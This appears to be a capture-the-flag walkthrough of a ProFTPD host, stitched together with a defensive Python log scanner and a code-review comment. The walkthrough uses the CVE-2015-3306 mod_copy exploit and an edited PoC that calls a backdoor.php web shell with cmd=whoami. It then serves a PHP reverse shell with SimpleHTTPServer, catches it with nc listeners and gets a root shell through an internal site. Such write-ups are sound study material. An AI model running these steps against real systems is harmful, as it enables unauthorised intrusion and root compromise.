110_ProFTPD
Nmap
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|_http-title: Apache2 Debian Default Page: It works
Directories found on port 8098:
/level
/server-status
Discovery of /level/
dirb http://192.168.142.110:8098/
https://www.exploit-db.com/exploits/49908
If you keep looking you will find something that looks even better, but it won't work.
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
https://github.com/t0kx/exploit-CVE-2015-3306
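The defender's side of the vulnerability identified above, as an added example that is not part of this writeup or the linked PoC: a small Python scanner that flags the mod_copy SITE CPFR/CPTO commands behind CVE-2015-3306 in ProFTPD ExtendedLog lines, either issued before any login or landing in a web-served path. The LogFormat "%t %a %u %r %s", the web-root list and the sample log lines are assumptions constructed for the example.

```python
"""Flag ProFTPD mod_copy (SITE CPFR/CPTO) use that fits the CVE-2015-3306
pattern: copies issued before login, or copies landing in a web-served path."""
import re

# Assumed ExtendedLog layout: LogFormat copywatch "%t %a %u %r %s"
# -> [time] client-ip login-name("-" before USER) full-command reply-code
LINE_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\]\s+(?P<client>\S+)\s+(?P<user>\S+)\s+'
    r'SITE\s+(?P<sub>CPFR|CPTO)\s+(?P<path>.+?)\s+(?P<code>\d{3})$',
    re.IGNORECASE,
)

# Paths the web server publishes; adjust to the host (assumption for the example).
WEB_ROOTS = ("/var/www/", "/srv/http/", "/usr/share/nginx/")
SCRIPT_EXT = (".php", ".phtml", ".cgi", ".jsp")

# Constructed sample log, not real traffic. Lines 1-2 mimic an unauthenticated
# client copying a file into the web root; lines 3-5 are a normal logged-in user.
SAMPLE_LOG = """\
[05/Mar/2021:10:01:10 +0000] 192.168.142.50 - SITE CPFR /tmp/notes.txt 350
[05/Mar/2021:10:01:11 +0000] 192.168.142.50 - SITE CPTO /var/www/html/level/backdoor.php 250
[05/Mar/2021:10:05:00 +0000] 10.0.0.7 alice SITE CPFR /home/alice/report.txt 350
[05/Mar/2021:10:05:01 +0000] 10.0.0.7 alice SITE CPTO /home/alice/report.bak 250
[05/Mar/2021:10:06:00 +0000] 10.0.0.7 alice RETR /home/alice/report.bak 226
"""


def scan_proftpd_log(text):
    """Return (line_no, client, reason) for each suspicious mod_copy command."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a SITE CPFR/CPTO line
        user, sub, path = m["user"], m["sub"].upper(), m["path"]
        if user == "-":
            # mod_copy honouring CPFR/CPTO with no login is the CVE-2015-3306 bug itself
            findings.append((n, m["client"], f"unauthenticated SITE {sub}"))
        if sub == "CPTO" and (path.startswith(WEB_ROOTS)
                              or path.lower().endswith(SCRIPT_EXT)):
            findings.append((n, m["client"], f"copy into web-served path {path}"))
    return findings


if __name__ == "__main__":
    for line_no, client, reason in scan_proftpd_log(SAMPLE_LOG):
        print(f"line {line_no}: {client}: {reason}")
```

On a patched ProFTPD the pre-login copies never succeed, so the first rule should stay silent; the second rule still catches a logged-in account being used to plant scripts under the web root.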
Edit PoC
self.__host + "/backdoor.php")
---
> print("[+] Target exploited, acessing shell at http://" +
self.__host + ":8098/level/backdoor.php")
40c40
< data = requests.get("http://" + self.__host +
"/backdoor.php?cmd=whoami")
---
> data = requests.get("http://" + self.__host +
":8098/level/backdoor.php?cmd=whoami")
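Review bot: both hunks hard-code the ":8098/level" port and path into separate string literals (the shell URL in the print at 40c40's sibling hunk and the requests.get() URL here), so the next target change has to be made twice; define one base URL alongside self.__host and build both strings from it so they cannot drift apart.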
Drop php reverse shell
The web shell is inconvenient to work with, so serve a PHP reverse shell from the attack machine and drop it onto the target.
shell.php
python -m SimpleHTTPServer 5555
nc -nvlp 4444
After the intrusion succeeds, reconnect on port 6666, because port 4444 may be needed for the root shell later.
In addition, there seems to be an internal site on ports 5000 and 3306.
Copy php reverse shell
Now that we know the internal site is running as root, can we install a php reverse shell here?
Luckily, /var/www2/ was noticed before looking at the configuration file.
Inside are /files and /files/robots.txt; use curl to check that they match what the internal site serves.
curl http://127.0.0.1:5000
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>403 Forbidden</h1>
</body>
</html>
curl http://127.0.0.1:5000/files/robots.txt
User-agent: *
Disallow: /config.php
Disallow: /administration/
Disallow: /includes/
Disallow: /locale/
Disallow: /themes/
Disallow: /print.php
Privilege Escalation
curl http://127.0.0.1:5000/files/shell.php
When the file is requested from inside the host, nc receives a reverse shell running as root.
nc -nvlp 4444